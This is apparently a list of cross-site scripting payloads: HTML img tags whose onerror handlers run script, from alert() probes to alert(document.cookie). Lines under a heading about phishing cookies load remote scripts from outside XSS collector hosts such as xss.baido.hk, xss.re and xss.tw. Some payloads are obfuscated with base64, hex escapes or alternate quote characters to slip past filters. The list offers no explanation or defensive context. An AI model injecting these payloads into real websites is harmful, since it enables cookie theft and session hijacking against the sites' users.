<img src='non-exist.jpg'onerror="alert('xss')">
<img src=# onerror=alert(123)>
<img src=# onerror=alert(document.cookie)>
The following use a platform to phish cookies:
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
<img src="#">
<img src="#">
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
<img src=x width="0" height="0"></img>
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>